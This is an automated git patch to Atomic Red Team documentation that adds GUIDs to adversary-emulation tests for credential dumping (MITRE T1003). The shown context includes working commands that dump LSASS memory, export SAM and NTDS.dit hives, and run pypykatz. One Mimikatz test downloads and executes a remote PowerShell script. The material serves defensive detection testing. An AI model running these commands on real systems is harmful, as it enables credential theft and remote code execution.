From: CircleCI Atomic Red Team doc generator Date: Thu, 24 Jun 2021 15:16:54 +0000 Subject: [PATCH 64/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.001/T1003.001.md | 86 ++++++++++++++-------- atomics/T1003.002/T1003.002.md | 24 ++++--- atomics/T1003.003/T1003.003.md | 48 ++++++++----- atomics/T1003.004/T1003.004.md | 8 ++- atomics/T1003.006/T1003.006.md | 8 ++- atomics/T1003.007/T1003.007.md | 18 +++-- atomics/T1003.008/T1003.008.md | 12 ++-- atomics/T1003/T1003.md | 14 ++-- atomics/T1006/T1006.md | 6 +- atomics/T1007/T1007.md | 10 ++- atomics/T1010/T1010.md | 8 ++- atomics/T1012/T1012.md | 4 +- atomics/T1014/T1014.md | 24 ++++--- atomics/T1016/T1016.md | 42 +++++++---- atomics/T1018/T1018.md | 66 +++++++++++------ atomics/T1020/T1020.md | 6 +- atomics/T1021.001/T1021.001.md | 14 ++-- atomics/T1021.002/T1021.002.md | 26 ++++--- atomics/T1021.003/T1021.003.md | 6 +- atomics/T1021.006/T1021.006.md | 20 ++++-- atomics/T1027.001/T1027.001.md | 8 ++- atomics/T1027.002/T1027.002.md | 24 ++++--- atomics/T1027.004/T1027.004.md | 16 +++-- atomics/T1027/T1027.md | 36 ++++++---- atomics/T1030/T1030.md | 8 ++- atomics/T1033/T1033.md | 14 ++-- atomics/T1036.003/T1036.003.md | 44 ++++++++---- atomics/T1036.004/T1036.004.md | 8 ++- atomics/T1036.005/T1036.005.md | 6 +- atomics/T1036.006/T1036.006.md | 4 +- atomics/T1036/T1036.md | 4 +- atomics/T1037.001/T1037.001.md | 6 +- atomics/T1037.002/T1037.002.md | 4 +- atomics/T1037.004/T1037.004.md | 12 +++- atomics/T1037.005/T1037.005.md | 4 +- atomics/T1040/T1040.md | 30 +++++--- atomics/T1046/T1046.md | 28 +++++--- atomics/T1047/T1047.md | 40 +++++++---- atomics/T1048.003/T1048.003.md | 26 ++++--- atomics/T1048/T1048.md | 12 ++-- atomics/T1049/T1049.md | 22 ++++-- atomics/T1053.001/T1053.001.md | 10 +-- atomics/T1053.002/T1053.002.md | 4 +- atomics/T1053.003/T1053.003.md | 18 +++-- atomics/T1053.004/T1053.004.md | 6 +- atomics/T1053.005/T1053.005.md | 32 ++++++--- 
atomics/T1053.006/T1053.006.md | 6 +- atomics/T1053.007/T1053.007.md | 12 ++-- atomics/T1055.001/T1055.001.md | 8 ++- atomics/T1055.004/T1055.004.md | 6 +- atomics/T1055.012/T1055.012.md | 14 ++-- atomics/T1055/T1055.md | 16 +++-- atomics/T1056.001/T1056.001.md | 10 ++- atomics/T1056.002/T1056.002.md | 8 ++- atomics/T1056.004/T1056.004.md | 8 ++- atomics/T1057/T1057.md | 10 ++- atomics/T1059.001/T1059.001.md | 110 ++++++++++++++++++---------- atomics/T1059.002/T1059.002.md | 4 +- atomics/T1059.003/T1059.003.md | 14 ++-- atomics/T1059.004/T1059.004.md | 10 ++- atomics/T1059.005/T1059.005.md | 22 +++--- atomics/T1059.006/T1059.006.md | 24 ++++--- atomics/T1069.001/T1069.001.md | 12 +++- atomics/T1069.002/T1069.002.md | 44 ++++++++---- atomics/T1070.001/T1070.001.md | 16 +++-- atomics/T1070.002/T1070.002.md | 16 +++-- atomics/T1070.003/T1070.003.md | 46 ++++++++---- atomics/T1070.004/T1070.004.md | 66 +++++++++++------ atomics/T1070.005/T1070.005.md | 18 +++-- atomics/T1070.006/T1070.006.md | 58 +++++++++------ atomics/T1070/T1070.md | 4 +- atomics/T1071.001/T1071.001.md | 20 ++++-- atomics/T1071.004/T1071.004.md | 24 ++++--- atomics/T1072/T1072.md | 8 ++- atomics/T1074.001/T1074.001.md | 18 +++-- atomics/T1078.001/T1078.001.md | 6 +- atomics/T1078.003/T1078.003.md | 4 +- atomics/T1082/T1082.md | 48 +++++++++---- atomics/T1083/T1083.md | 20 ++++-- atomics/T1087.001/T1087.001.md | 54 +++++++++----- atomics/T1087.002/T1087.002.md | 66 +++++++++++------ atomics/T1090.001/T1090.001.md | 18 +++-- atomics/T1095/T1095.md | 20 ++++-- atomics/T1098.004/T1098.004.md | 4 +- atomics/T1098/T1098.md | 12 ++-- atomics/T1105/T1105.md | 86 ++++++++++++++-------- atomics/T1106/T1106.md | 6 +- atomics/T1110.001/T1110.001.md | 12 ++-- atomics/T1110.002/T1110.002.md | 8 ++- atomics/T1110.003/T1110.003.md | 20 ++++-- atomics/T1110.004/T1110.004.md | 16 +++-- atomics/T1112/T1112.md | 30 +++++--- atomics/T1113/T1113.md | 34 +++++---- atomics/T1114.001/T1114.001.md | 8 ++- 
atomics/T1115/T1115.md | 20 ++++-- atomics/T1119/T1119.md | 16 +++-- atomics/T1120/T1120.md | 4 +- atomics/T1123/T1123.md | 4 +- atomics/T1124/T1124.md | 10 ++- atomics/T1127.001/T1127.001.md | 16 +++-- atomics/T1132.001/T1132.001.md | 6 +- atomics/T1133/T1133.md | 8 ++- atomics/T1134.001/T1134.001.md | 8 ++- atomics/T1134.004/T1134.004.md | 40 +++++++---- atomics/T1135/T1135.md | 32 ++++++--- atomics/T1136.001/T1136.001.md | 36 ++++++---- atomics/T1136.002/T1136.002.md | 18 +++-- atomics/T1137.002/T1137.002.md | 6 +- atomics/T1137.004/T1137.004.md | 6 +- atomics/T1137/T1137.md | 4 +- atomics/T1140/T1140.md | 12 ++-- atomics/T1176/T1176.md | 16 +++-- atomics/T1197/T1197.md | 24 ++++--- atomics/T1201/T1201.md | 32 ++++++--- atomics/T1202/T1202.md | 18 +++-- atomics/T1204.002/T1204.002.md | 60 ++++++++++------ atomics/T1207/T1207.md | 10 +-- atomics/T1216.001/T1216.001.md | 6 +- atomics/T1216/T1216.md | 12 ++-- atomics/T1217/T1217.md | 34 ++++++--- atomics/T1218.001/T1218.001.md | 54 ++++++++------ atomics/T1218.002/T1218.002.md | 8 ++- atomics/T1218.003/T1218.003.md | 16 +++-- atomics/T1218.004/T1218.004.md | 64 ++++++++++------- atomics/T1218.005/T1218.005.md | 64 +++++++++++------ atomics/T1218.007/T1218.007.md | 22 +++--- atomics/T1218.008/T1218.008.md | 8 ++- atomics/T1218.009/T1218.009.md | 16 +++-- atomics/T1218.010/T1218.010.md | 38 ++++++---- atomics/T1218.011/T1218.011.md | 54 +++++++++----- atomics/T1218/T1218.md | 62 ++++++++++------ atomics/T1219/T1219.md | 12 +++- atomics/T1220/T1220.md | 30 +++++--- atomics/T1221/T1221.md | 8 ++- atomics/T1222.001/T1222.001.md | 40 +++++++---- atomics/T1222.002/T1222.002.md | 54 +++++++++----- atomics/T1482/T1482.md | 34 +++++---- atomics/T1485/T1485.md | 14 ++-- atomics/T1486/T1486.md | 32 +++++---- atomics/T1489/T1489.md | 18 +++-- atomics/T1490/T1490.md | 30 +++++--- atomics/T1491.001/T1491.001.md | 6 +- atomics/T1496/T1496.md | 4 +- atomics/T1497.001/T1497.001.md | 12 +++- atomics/T1505.002/T1505.002.md | 8 ++- 
atomics/T1505.003/T1505.003.md | 8 ++- atomics/T1518.001/T1518.001.md | 24 +++++-- atomics/T1518/T1518.md | 12 +++- atomics/T1529/T1529.md | 44 ++++++++---- atomics/T1531/T1531.md | 20 ++++-- atomics/T1543.001/T1543.001.md | 8 ++- atomics/T1543.002/T1543.002.md | 12 ++-- atomics/T1543.003/T1543.003.md | 20 ++++-- atomics/T1543.004/T1543.004.md | 8 ++- atomics/T1546.001/T1546.001.md | 6 +- atomics/T1546.002/T1546.002.md | 6 +- atomics/T1546.003/T1546.003.md | 4 +- atomics/T1546.004/T1546.004.md | 12 ++-- atomics/T1546.005/T1546.005.md | 4 +- atomics/T1546.007/T1546.007.md | 6 +- atomics/T1546.008/T1546.008.md | 10 ++- atomics/T1546.010/T1546.010.md | 10 +-- atomics/T1546.011/T1546.011.md | 18 +++-- atomics/T1546.012/T1546.012.md | 12 ++-- atomics/T1546.013/T1546.013.md | 8 ++- atomics/T1546.014/T1546.014.md | 6 +- atomics/T1547.001/T1547.001.md | 34 ++++++--- atomics/T1547.004/T1547.004.md | 18 +++-- atomics/T1547.005/T1547.005.md | 6 +- atomics/T1547.006/T1547.006.md | 8 ++- atomics/T1547.007/T1547.007.md | 10 ++- atomics/T1547.009/T1547.009.md | 10 ++- atomics/T1547.010/T1547.010.md | 6 +- atomics/T1547.011/T1547.011.md | 4 +- atomics/T1548.001/T1548.001.md | 18 +++-- atomics/T1548.002/T1548.002.md | 52 +++++++++----- atomics/T1548.003/T1548.003.md | 12 +++- atomics/T1550.002/T1550.002.md | 16 +++-- atomics/T1550.003/T1550.003.md | 8 ++- atomics/T1552.001/T1552.001.md | 22 ++++-- atomics/T1552.002/T1552.002.md | 8 ++- atomics/T1552.003/T1552.003.md | 6 +- atomics/T1552.004/T1552.004.md | 22 ++++-- atomics/T1552.006/T1552.006.md | 16 +++-- atomics/T1552.007/T1552.007.md | 22 +++--- atomics/T1553.001/T1553.001.md | 6 +- atomics/T1553.004/T1553.004.md | 38 ++++++---- atomics/T1553.005/T1553.005.md | 16 +++-- atomics/T1555.001/T1555.001.md | 6 +- atomics/T1555.003/T1555.003.md | 22 +++--- atomics/T1555/T1555.md | 14 ++-- atomics/T1556.002/T1556.002.md | 8 ++- atomics/T1558.001/T1558.001.md | 8 ++- atomics/T1558.003/T1558.003.md | 4 +- atomics/T1559.002/T1559.002.md | 
12 +++- atomics/T1560.001/T1560.001.md | 62 ++++++++++------ atomics/T1560.002/T1560.002.md | 32 +++++---- atomics/T1560/T1560.md | 6 +- atomics/T1562.001/T1562.001.md | 128 ++++++++++++++++++++++----------- atomics/T1562.002/T1562.002.md | 18 +++-- atomics/T1562.003/T1562.003.md | 10 ++- atomics/T1562.004/T1562.004.md | 34 ++++++--- atomics/T1562.006/T1562.006.md | 12 ++-- atomics/T1563.002/T1563.002.md | 6 +- atomics/T1564.001/T1564.001.md | 38 ++++++---- atomics/T1564.002/T1564.002.md | 12 ++-- atomics/T1564.003/T1564.003.md | 6 +- atomics/T1564.004/T1564.004.md | 26 ++++--- atomics/T1564/T1564.md | 14 ++-- atomics/T1566.001/T1566.001.md | 12 ++-- atomics/T1569.001/T1569.001.md | 6 +- atomics/T1569.002/T1569.002.md | 14 ++-- atomics/T1571/T1571.md | 12 ++-- atomics/T1573/T1573.md | 6 +- atomics/T1574.001/T1574.001.md | 4 +- atomics/T1574.002/T1574.002.md | 8 ++- atomics/T1574.006/T1574.006.md | 16 +++-- atomics/T1574.009/T1574.009.md | 6 +- atomics/T1574.011/T1574.011.md | 14 ++-- atomics/T1574.012/T1574.012.md | 24 ++++--- atomics/T1609/T1609.md | 6 +- atomics/T1610/T1610.md | 14 ++-- atomics/T1611/T1611.md | 14 ++-- 223 files changed, 2923 insertions(+), 1473 deletions(-) diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 94a97982..9869cc02 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -54,6 +54,9 @@ The following SSPs can be used to access credentials:
## Atomic Test #1 - Windows Credential Editor + +auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed + Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only) Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file. @@ -61,14 +64,13 @@ Upon successful execution, you should see a file with user passwords/hashes at % If you see no output it is likely that execution was blocked by Anti-Virus. If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting data should be placed | Path | %temp%\wce-output.txt| | wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933| @@ -94,7 +96,7 @@ del "#{output_file}" >nul 2>&1 ##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{wce_exe}) {exit 0} else {exit 1} +if (Test-Path #{wce_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -115,20 +117,22 @@ if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump + +auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp| | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe| @@ -152,7 +156,7 @@ del "#{output_file}" >nul 2> nul ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} +if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -170,10 +174,12 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll + +auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. - **Supported Platforms:** Windows @@ -200,20 +206,22 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking + +auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp. If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe| @@ -236,7 +244,7 @@ del C:\windows\temp\dumpert.dmp >nul 2> nul ##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} +if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -252,9 +260,11 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager + +auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607 + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions. - **Supported Platforms:** Windows @@ -282,16 +292,18 @@ Manager and administrative permissions.
## Atomic Test #6 - Offline Credential Theft With Mimikatz + +auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023 + The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path of the Lsass dump | Path | %tmp%\lsass.DMP| | mimikatz_exe | Path of the Mimikatz binary | string | PathToAtomicsFolder\T1003.001\bin\mimikatz.exe| @@ -311,7 +323,7 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and c ##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} +if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -332,7 +344,7 @@ Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force ##### Description: Lsass dump must exist at specified location (#{input_file}) ##### Check Prereq Commands: ```powershell -cmd /c "if not exist #{input_file} (exit /b 1)" +cmd /c "if not exist #{input_file} (exit /b 1)" ``` ##### Get Prereq Commands: ```powershell @@ -346,12 +358,14 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
## Atomic Test #7 - LSASS read with pypykatz + +auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8 + Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple useranames and passwords/hashes to the screen. - **Supported Platforms:** Windows @@ -373,7 +387,7 @@ pypykatz live lsa ##### Check Prereq Commands: ```cmd py -3 --version >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -383,7 +397,7 @@ echo "Python 3 must be installed manually" ##### Check Prereq Commands: ```cmd py -3 -m pip --version >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -393,7 +407,7 @@ echo "PIP must be installed manually" ##### Check Prereq Commands: ```cmd pypykatz -h >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -407,10 +421,12 @@ pip install pypykatz
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1 + +auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781 + The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. - **Supported Platforms:** Windows @@ -438,20 +454,22 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump + +auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp| | procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder\T1003.001\bin\procdump.exe| @@ -475,7 +493,7 @@ del "#{output_file}" >nul 2> nul ##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} +if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -492,18 +510,20 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #10 - Powershell Mimikatz + +auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc + Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1| @@ -524,16 +544,18 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe + +auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 + This test uses the technique describe in this tweet (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\dotnet-lsass.dmp| | createdump_exe | Path of createdump.exe executable | Path | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe| @@ -561,7 +583,7 @@ del #{output_file} ##### Description: Computer must have createdump.exe from .Net 5 ##### Check Prereq Commands: ```powershell -if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1} +if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -575,19 +597,21 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs + +auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe| | output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp| @@ -611,7 +635,7 @@ Remove-Item ${output_file} -ErrorAction Ignore ##### Description: Computer must have xordump.exe ##### Check Prereq Commands: ```powershell -if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} +if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index 1516c1da..73f20f13 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -36,11 +36,13 @@ Notes:
## Atomic Test #1 - Registry dump of SAM, creds, and secrets + +auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44 + Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory. - **Supported Platforms:** Windows @@ -71,8 +73,10 @@ del %temp%\security >nul 2> nul
## Atomic Test #2 - Registry parse with pypykatz -Parses registry hives to obtain stored credentials +auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 + +Parses registry hives to obtain stored credentials **Supported Platforms:** Windows @@ -94,7 +98,7 @@ pypykatz live registry ##### Check Prereq Commands: ```cmd py -3 --version >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -104,7 +108,7 @@ echo "Python 3 must be installed manually" ##### Check Prereq Commands: ```cmd py -3 -m pip --version >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -114,7 +118,7 @@ echo "PIP must be installed manually" ##### Check Prereq Commands: ```cmd pypykatz -h >nul 2>&1 -exit /b %errorlevel% +exit /b %errorlevel% ``` ##### Get Prereq Commands: ```cmd @@ -128,16 +132,18 @@ pip install pypykatz
## Atomic Test #3 - esentutl.exe SAM copy + +auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480 + Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_path | Path to the file to copy | Path | %SystemRoot%/system32/config/SAM| | file_name | Name of the copied file | String | SAM| @@ -164,8 +170,10 @@ del #{copy_dest}\#{file_name} >nul 2>&1
## Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames -Executes a hashdump by reading the hasshes from the registry. +auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 + +Executes a hashdump by reading the hasshes from the registry. **Supported Platforms:** Windows diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index 60657899..c89af84f 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md @@ -30,17 +30,19 @@ The following tools and techniques can be used to enumerate the NTDS file and th
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin + +auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| @@ -59,7 +61,7 @@ vssadmin.exe create shadow /for=#{drive_letter} ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: ```cmd -reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT +reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: ```cmd @@ -73,6 +75,9 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy + +auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03 + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. @@ -80,14 +85,13 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1| | extract_path | Path for extracted NTDS.dit | Path | C:\Windows\Temp| @@ -115,7 +119,7 @@ del "#{extract_path}\SYSTEM_HIVE" >nul 2> nul ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: ```cmd -reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT +reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: ```cmd @@ -124,7 +128,7 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually ##### Description: Volume shadow copy must exist ##### Check Prereq Commands: ```cmd -if not exist #{vsc_name} (exit /b 1) +if not exist #{vsc_name} (exit /b 1) ``` ##### Get Prereq Commands: ```cmd @@ -133,7 +137,7 @@ echo Run "Invoke-AtomicTest T1003.003 -TestName 'Create Volume Shadow Copy with ##### Description: Extract path must exist ##### Check Prereq Commands: ```cmd -if not exist #{extract_path} (exit /b 1) +if not exist #{extract_path} (exit /b 1) ``` ##### Get Prereq Commands: ```cmd 
@@ -147,6 +151,9 @@ mkdir #{extract_path}
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil + +auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723 + This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability @@ -154,14 +161,13 @@ uses the "IFM" or "Install From Media" backup functionality that allows Active D subsequent domain controllers without the need of network-based replication. Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_folder | Path where resulting dump should be placed | Path | C:\Windows\Temp\ntds_T1003| @@ -185,7 +191,7 @@ rmdir /q /s #{output_folder} >nul 2>&1 ##### Description: Target must be a Domain Controller ##### Check Prereq Commands: ```cmd -reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT +reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT ``` ##### Get Prereq Commands: ```cmd @@ -199,17 +205,19 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
